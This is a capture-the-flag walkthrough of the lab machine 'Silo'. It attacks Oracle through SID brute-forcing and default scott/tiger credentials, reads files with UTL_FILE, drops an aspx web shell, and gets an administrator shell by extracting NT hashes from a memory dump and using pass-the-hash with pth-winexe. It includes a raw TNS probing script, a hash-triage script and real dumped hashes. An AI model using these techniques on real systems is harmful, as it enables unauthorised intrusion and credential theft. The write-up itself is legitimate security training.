From the initial scan, Oracle is the obvious target on this box. Once the small installation hurdles for the ODAT tooling on Kali were out of the way, the path was straightforward: ODAT is very effective against this kind of box, which looks like a system and database installed and configured by a sysadmin (or DBA) in a real hurry.

There is probably another path that does not go straight for the Administrator flag, but I have not found it.
So once connected, I found a memory dump on the Phineas user's Desktop and went for the classic privilege escalation route as well, exploiting the memory dump.

Enumeration

Nmap

Begin a global nmap scan with options:

  • -sC: run the default NSE scripts
  • -sV: Version detection
  • -oA: output file on all formats (normal + xml + grepable)
  • -p-: port 1 to 65535
root@kali-oscp:~# nmap -sC -sV -oA nmap-silo 10.10.10.82 -p-
        Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-13 15:10 WAT
        Nmap scan report for 10.10.10.82
        Host is up (0.10s latency).
        Not shown: 65520 closed ports
        PORT      STATE SERVICE      VERSION
        80/tcp    open  http         Microsoft IIS httpd 8.5
        | http-methods: 
        |_  Potentially risky methods: TRACE
        |_http-server-header: Microsoft-IIS/8.5
        |_http-title: IIS Windows Server
        135/tcp   open  msrpc        Microsoft Windows RPC
        139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
        445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
        1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
        5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-server-header: Microsoft-HTTPAPI/2.0
        |_http-title: Not Found
        47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-server-header: Microsoft-HTTPAPI/2.0
        |_http-title: Not Found
        49152/tcp open  msrpc        Microsoft Windows RPC
        49153/tcp open  msrpc        Microsoft Windows RPC
        49154/tcp open  msrpc        Microsoft Windows RPC
        49155/tcp open  msrpc        Microsoft Windows RPC
        49158/tcp open  msrpc        Microsoft Windows RPC
        49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
        49161/tcp open  msrpc        Microsoft Windows RPC
        49162/tcp open  msrpc        Microsoft Windows RPC  
        Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

So we have:
- a web server, IIS 8.5
- SMB (139 & 445)
- an Oracle TNS listener, version 11.2.0.2.0 (Oracle XE 11g)
- WinRM (remote PowerShell) on 5985

WEB ENUM

Default IIS Windows Server page at http://10.10.10.82/: nothing interesting here.

ORACLE ENUMERATION

PRE-REQUISITES FOR ODAT

What is odat ?

According to its GitHub description, ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool that tests the security of Oracle databases remotely.
It can be used to find SIDs, guess credentials, escalate privileges, read and write files on the database host, get a reverse shell, ...

Install Oracle Client

Create a free account on oracle.com, then follow this link (https://www.oracle.com/technetwork/topics/linuxsoft-082809.html) and download the three needed packages: basic, sqlplus and devel (the SDK):
- oracle-instantclient18.3-basic-18.3.0.0.0-1.i386.rpm
- oracle-instantclient18.3-sqlplus-18.3.0.0.0-1.i386.rpm
- oracle-instantclient18.3-devel-18.3.0.0.0-1.i386.rpm

Convert the RPM packages with alien so they can be installed on Debian-based Kali.

root@kali-oscp:~ # apt install -y libaio1 python-dev alien python-pip
root@kali-oscp:~/download# ls                                                                      
        oracle-instantclient18.3-basic-18.3.0.0.0-1.i386.rpm  oracle-instantclient18.3-sqlplus-18.3.0.0.0-1.i386.rpm
        oracle-instantclient18.3-devel-18.3.0.0.0-1.i386.rpm     

root@kali-oscp:~/download# alien --to-deb *.rpm
        oracle-instantclient18.3-basic_18.3.0.0.0-2_i386.deb generated
        oracle-instantclient18.3-devel_18.3.0.0.0-2_i386.deb generated
        oracle-instantclient18.3-sqlplus_18.3.0.0.0-2_i386.deb generated

root@kali-oscp:~/download# dpkg -i *.deb



Edit /etc/profile and add the following (replace 18.3 with the Instant Client version you installed). Both cx_Oracle and sqlplus locate the client libraries through these variables.

export ORACLE_HOME=/usr/lib/oracle/18.3/client/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

Reload the environment (or open a new session):
source /etc/profile

Install Odat

Now we can finally start working on the box. Begin by cloning the ODAT Git repository.

root@kali-oscp:~/tools/oracle# git clone https://github.com/quentinhardy/odat.git
    Cloning into 'odat'...
    remote: Enumerating objects: 716, done.
    remote: Total 716 (delta 0), reused 0 (delta 0), pack-reused 716
    Receiving objects: 100% (716/716), 807.47 KiB | 1.63 MiB/s, done.
    Resolving deltas: 100% (432/432), done.



Other ODAT dependencies

Running ODAT without the cx_Oracle Python binding fails at import time; install it with pip. It loads the Instant Client libraries installed above, so ORACLE_HOME and LD_LIBRARY_PATH must already be set in the shell.

root@kali-oscp:~/tools/oracle/odat# python odat.py -h
    Traceback (most recent call last):
      File "odat.py", line 17, in <module>
        import argparse, logging, platform, cx_Oracle, string, os, sys
    ImportError: No module named cx_Oracle

root@kali-oscp:~/tools/oracle/odat# python -m pip install cx_Oracle --upgrade
    Collecting cx_Oracle
      Downloading https://files.pythonhosted.org/packages/b7/70/03dbb0f055ee97f7ddb6c6f11668f23a97b5884fdf4826a006ef91c5085c/cx_Oracle-7.0.0.tar.gz (281kB)
        100% |████████████████████████████████| 286kB 2.4MB/s 
    Building wheels for collected packages: cx-Oracle
      Running setup.py bdist_wheel for cx-Oracle ... done
      Stored in directory: /root/.cache/pip/wheels/31/db/58/a89e912df33e3545643a49cd8bcfe0f513d101b9d115cbeae4
    Successfully built cx-Oracle
    Installing collected packages: cx-Oracle
    Successfully installed cx-Oracle-7.0.0


ENUMERATE ORACLE SID'S

Method n°1 (odat)

Use the sidguesser module of ODAT, which first tries a list of well-known SIDs, then brute-forces all 1- and 2-character SIDs.

root@kali-oscp:~/tools/oracle/odat# ./odat.py sidguesser -s 10.10.10.82
    [1] (10.10.10.82:1521): Searching valid SIDs
    [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
    [+] 'XE' is a valid SID. Continue...                                                                                                                                 
    [+] 'XEXDB' is a valid SID. Continue...                                                                                                                              
    100% |##############################################################################################################################################| Time: 00:00:31 
    [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
    100% |##############################################################################################################################################| Time: 00:00:01 
    [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
    [+] 'XE' is a valid SID. Continue...                                                                                                                                 
    100% |##############################################################################################################################################| Time: 00:00:28 
    [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB



Method n°2 (metasploit)

The auxiliary/admin/oracle/sid_brute Metasploit module only tries SIDs from a wordlist, but in our case that is enough. Note that it also reports 'PLSExtProc', which is the listener's external procedure (extproc) entry rather than a database instance; XE is the one to use.

root@kali-oscp:~# msfconsole
msf> use auxiliary/admin/oracle/sid_brute
msf auxiliary(admin/oracle/sid_brute) > set RHOST 10.10.10.82
msf auxiliary(admin/oracle/sid_brute) > run
        [*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
        [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
        [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
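Both tools rely on the same listener behaviour: a TNS CONNECT packet for a SID the listener knows is answered with ACCEPT, REDIRECT or RESEND, while an unknown SID gets a REFUSE carrying ORA-12505 (or ORA-12514 for an unknown service name). The following Python is an added example written for this write-up, not ODAT or Metasploit code; it builds the CONNECT packet, classifies the reply, and ships constructed sample replies so the parser can be exercised offline. The host, port and candidate SIDs are taken from the scan above and are only placeholders.

```python
"""Minimal Oracle TNS SID probe (added example; not ODAT/Metasploit code)."""
import re
import socket
import struct
import sys

TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
UNKNOWN_SID_ERRORS = {12505, 12514}   # ORA-12505 unknown SID, ORA-12514 unknown service
CONNECT_DATA_OFFSET = 58              # 8-byte TNS header + 50-byte CONNECT body


def build_connect_packet(host: str, port: int, sid: str) -> bytes:
    """Build a TNS CONNECT (type 1) packet whose connect string names `sid`."""
    connect_data = (
        f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))"
        f"(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT={port})))"
    ).encode()
    body = struct.pack(
        ">HHHHHHHHHHIBB",
        0x0136,              # protocol version 310
        0x012C,              # lowest compatible version 300
        0x0000,              # service options
        0x0800,              # session data unit size
        0x7FFF,              # maximum transmission data unit
        0x4F98,              # NT protocol characteristics
        0x0000,              # line turnaround value
        0x0100,              # "value of 1 in hardware": byte-order probe
        len(connect_data),   # connect data length
        CONNECT_DATA_OFFSET, # offset of connect data from packet start
        0,                   # maximum receivable connect data
        0x41, 0x41,          # connect flags
    ) + bytes(24)            # trace / cross-facility items, zeroed
    total = 8 + len(body) + len(connect_data)
    header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)  # len, csum, type, rsvd, hdr csum
    return header + body + connect_data


def inspect_connect_packet(pkt: bytes) -> dict:
    """Decode the interesting CONNECT fields (also usable on captured traffic)."""
    length, _checksum, ptype = struct.unpack(">HHB", pkt[:5])
    cd_len, cd_off = struct.unpack(">HH", pkt[24:28])
    return {"length": length, "type": ptype, "connect_data_len": cd_len,
            "connect_data_offset": cd_off, "connect_data": pkt[cd_off:cd_off + cd_len]}


def parse_response(data: bytes):
    """Classify a raw listener reply as (verdict, ORA error number or None)."""
    if len(data) < 8:
        return "invalid", None
    ptype = data[4]
    if ptype == TNS_REFUSE:
        # REFUSE body: user reason (1), system reason (1), data length (2), then text
        text = data[12:].decode("ascii", errors="replace")
        m = re.search(r"\(ERR=(\d+)\)", text)
        err = int(m.group(1)) if m else None
        if err in UNKNOWN_SID_ERRORS:
            return "sid_unknown", err
        # Other codes (e.g. ORA-1153, malformed connect string) say nothing about the SID
        return "refused_other", err
    if ptype in (TNS_ACCEPT, TNS_REDIRECT, TNS_RESEND):
        return "sid_known", None
    return "unexpected", None


def probe_sid(host: str, port: int, sid: str, timeout: float = 5.0):
    """Send one CONNECT and classify the answer (live network call)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect_packet(host, port, sid))
        return parse_response(s.recv(4096))


# Constructed replies shaped like real listener answers, for offline testing only.
def make_refuse(err: int) -> bytes:
    text = (f"(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR={err})"
            f"(ERROR_STACK=(ERROR=(CODE={err})(EMFI=4))))").encode()
    body = struct.pack(">BBH", 0x22, 0x00, len(text)) + text
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_REFUSE, 0, 0) + body


def make_accept() -> bytes:
    body = struct.pack(">HHHHHH", 0x0136, 0x0000, 0x0800, 0x7FFF, 0x0100, 0x0000) + bytes(12)
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_ACCEPT, 0, 0) + body


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.82"
    for sid in ("XE", "XEXDB", "ORCL", "PLSExtProc"):   # short candidate list
        print(sid, probe_sid(host, 1521, sid))
```

Because the verdict comes from the error code inside the REFUSE text rather than from the packet type alone, a listener that refuses for an unrelated reason (ORA-1153 on a malformed string, for instance) is reported as "refused_other" instead of being mistaken for an unknown SID; that is the failure mode that produces false negatives in naive guessers.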


ENUMERATE SCHEMAS (USERNAMES)

Begin by making a lowercase copy of every entry in ODAT's default account list, accounts/accounts.txt: since Oracle 11g, passwords are case sensitive, so the upper-case defaults in that file will not match a lowercase password such as tiger.
root@kali-oscp:~/tools/oracle/odat# tr '[:upper:]' '[:lower:]' <accounts/accounts.txt > accounts/accounts-small.txt

Use the passwordguesser module of ODAT to find out whether any default credentials are still valid on the XE instance; it reports scott/tiger as valid.
root@kali-oscp:~/tools/oracle/odat# ./odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file accounts/accounts-small.txt

Verify these credentials by connecting manually to the database (the ORA-28002 line in the banner is only a password-expiry warning; the session is connected):

root@kali-oscp:~# sqlplus scott/tiger@10.10.10.82:1521/XE
    SQL*Plus: Release 18.0.0.0.0 - Production on Tue May 13 11:22:07 2018
    Version 18.3.0.0.0
    Copyright (c) 1982, 2018, Oracle.  All rights reserved.
    ERROR:
    ORA-28002: the password will expire within 7 days

    Connected to:
    Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
    SQL>


EXPLOITING ORACLE

PRIVILEGES GRANTING

Connecting AS SYSDBA with scott/tiger works, which means scott has been granted the SYSDBA privilege (thank you lazy sysadmin & nice box creator). Use that session to grant scott every system privilege for his ordinary sessions too; these privileges are what let the ODAT modules below read and write files on the host.

root@kali-oscp:~# sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 18.0.0.0.0 - Production on Wed Oct 31 03:32:39 2018
Version 18.3.0.0.0
Copyright (c) 1982, 2018, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> grant all privileges to scott identified by tiger;
Grant succeeded.


ODAT VULNERABILITY SCAN

Run ODAT's "all" module to check which modules can be used with this account.

root@kali-oscp:~/tools/oracle/odat# ./odat.py all -s 10.10.10.82 -d XE -U scott -P tiger
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?                                                                                              
[+] The target is vulnerable to a remote TNS poisoning                                                                                                                  
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account                                                                                  
...
[2.3] UTL_FILE library ?
[+] OK
...
[2.5] DBMSADVISOR library ?
[+] OK
...
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
...
[2.14] DBMS_LOB to read files ?
[+] OK
...
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
...
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[+] OK
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[+] OK
...


UTL_FILE

UTL_FILE will be the library to use. Its file I/O is performed by the database server process under that process's OS account, not the SQL user's, and since the Oracle service here runs as Administrator we can grab root.txt straight from the Administrator's Desktop ...

root@kali-oscp:~/tools/oracle/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --getFile "C:\Users\Administrator\Desktop" root.txt root.txt

[1] (10.10.10.82:1521): Read the root.txt file stored in C:\Users\Administrator\Desktop on the 10.10.10.82 server
[+] Data stored in the root.txt file sored in C:\Users\Administrator\Desktop (copied in root.txt locally):
cd39ea0af65********************

Hmm, OK. Now I need user.txt, but I did not have any username yet ...

As everything seems to have been installed with defaults on this server, it is a good idea to use the same module to write a command aspx shell into the default IIS web root (the --sysdba flag makes ODAT connect AS SYSDBA):
./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot\' 'nvko.aspx' /usr/share/webshells/aspx/cmdasp.aspx --sysdba

Then browse to http://10.10.10.82/nvko.aspx to get command execution directly from the browser, and simply grab user.txt.

BONUS GIFT

DROPBOX FILE

There is another interesting file on the Desktop of the Phineas user: "Oracle issue.txt". It contains a link to a file on Dropbox.

Follow the link and download the file.

Extract the two nested zip files (the first archive contains the second).

root@kali-oscp:~/download/# unzip 'MEMORY DUMP.zip'
root@kali-oscp:~/download/# unzip SILO-20180105-221806.zip

We now have a memory dump of about 1 GB. Volatility is the go-to tool here, as the framework can quickly extract valuable information from it.

EXTRACTING DATA WITH VOLATILITY

root@kali-oscp:~/tools# git clone https://github.com/volatilityfoundation/volatility.git
root@kali-oscp:~/tools# cd volatility
root@kali-oscp:~/tools/volatility# python vol.py imageinfo -f ~/download/SILO-20180105-221806.dmp 
    Volatility Foundation Volatility Framework 2.6
    INFO    : volatility.debug    : Determining profile based on KDBG search...
    WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow
    ...
              Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_10240_17770, Win10x64_14393, Win2012R2x64_18340, Win10x64, Win2016x64_14393, Win10x64_16299, Win2012R2x64, Win2012x64, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)
                         AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                         AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS)
                         AS Layer3 : FileAddressSpace (/root/download/SILO-20180105-221806.dmp)
                          PAE type : No PAE
                               DTB : 0x1a7000L
                              KDBG : 0xf80078520a30L
              Number of Processors : 2
         Image Type (Service Pack) : 0
                    KPCR for CPU 0 : 0xfffff8007857b000L
                    KPCR for CPU 1 : 0xffffd000207e8000L
                 KUSER_SHARED_DATA : 0xfffff78000000000L
               Image date and time : 2018-01-05 22:18:07 UTC+0000
         Image local date and time : 2018-01-05 22:18:07 +0000



Volatility suggests several profiles. Since we already have command execution on the host (and the Administrator flag), I check the Windows version number with "ver" from the aspx shell; it returns 6.3.9600.

Googling 6.3.9600 shows that it corresponds to Windows 8.1 Update 1 or Windows Server 2012 R2, so select the Win2012R2x64 profile from the list and ask Volatility (hivelist plugin) to locate the virtual addresses of the registry hives in the dump.

Perfect: the SYSTEM and SAM hives are there, so we can certainly dump the Administrator hash and use the pass-the-hash technique to get a remote shell. But before that, as I am not yet very familiar with Volatility, I tried a wide range of its numerous plugins; here are the interesting ones:



1- Extract commands history

(shows the program the box creator used to generate the dump: DumpIt.exe)

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 consoles
    ...
    Console: 0x7ff6fa136260 CommandHistorySize: 50
    HistoryBufferCount: 1 HistoryBufferMax: 4
    OriginalTitle: C:\Users\Administrator\Desktop\DumpIt.exe
    Title: C:\Users\Administrator\Desktop\DumpIt.exe



2- Hashdump

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
    Volatility Foundation Volatility Framework 2.6
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
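The hashdump lines are in pwdump format, user:RID:LM:NT:::, and the NT hash is simply MD4 over the UTF-16LE password; that is why the hash can be replayed with pth-winexe below without cracking it. The following Python is an added example written for this write-up, not Volatility or pth-winexe code. It carries its own MD4 (hashlib's is often disabled under OpenSSL 3), parses the three lines above as embedded sample input, flags accounts whose NT hash is the hash of an empty password, and checks candidate passwords offline against a dumped hash.

```python
"""NT-hash helpers for triaging a Volatility hashdump (added example)."""
import struct

# Sample input: the three hashdump lines from the Silo memory dump above.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""

LM_NOT_STORED = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled
_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (hashlib.new('md4') needs the OpenSSL legacy provider)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c        # rotate registers for the next step
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex as hashdump prints it."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str) -> list:
    """Parse pwdump-format lines into dicts; skips blank or malformed lines."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def triage(entries: list) -> dict:
    """Map each user to a list of findings worth a second look."""
    blank = nt_hash("")
    findings = {}
    for e in entries:
        notes = []
        if e["nt"] == blank:
            notes.append("empty password")
        if e["lm"] != LM_NOT_STORED:
            notes.append("LM hash stored (weak, crackable)")
        if e["rid"] == 500:
            notes.append("built-in Administrator (RID 500)")
        findings[e["user"]] = notes
    return findings


def check_password(entry: dict, candidate: str) -> bool:
    """Offline check of a candidate password against a dumped NT hash."""
    return nt_hash(candidate) == entry["nt"]


def pth_winexe_command(entry: dict, target: str, cmd: str = "cmd.exe") -> str:
    """The pth-winexe invocation for this entry; only the NT half does any work."""
    return f"pth-winexe -U {entry['user']}%{LM_NOT_STORED}:{entry['nt']} //{target} {cmd}"


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    for user, notes in triage(entries).items():
        print(f"{user}: {', '.join(notes) or 'nothing notable'}")
    print(pth_winexe_command(entries[0], "silo.htb"))
```

The Guest line is the one to notice: 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, so any hashdump containing it on an enabled account is a free login. Replace SAMPLE_HASHDUMP with the real plugin output when reusing this.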



3- Processes list

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist
    0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000                                                         
    0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000                                                         
    0xffffe00004fef940 TNSLSNR.EXE            1208    492      5        0      0      0 2018-01-05 22:17:18 UTC+0000                                       
    0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000 


PASS THE HASH

The nmap scan showed SMB open on 445, so we can use the pth-winexe binary shipped with Kali to get a shell from the NT hash alone, no cracking needed (it takes the LM:NT pair; the LM half is just the "no LM stored" constant). As a reminder, do not use the IP address, it will not work; add an entry to /etc/hosts instead (10.10.10.82 silo.htb, for example).

root@kali-oscp:~# pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //silo.htb cmd.exe
    E_md4hash wrapper called.
    HASH PASS: Substituting user supplied NTLM HASH...
    Microsoft Windows [Version 6.3.9600]
    (c) 2013 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>ver
    Microsoft Windows [Version 6.3.9600]

    C:\Windows\system32>whoami
    silo\administrator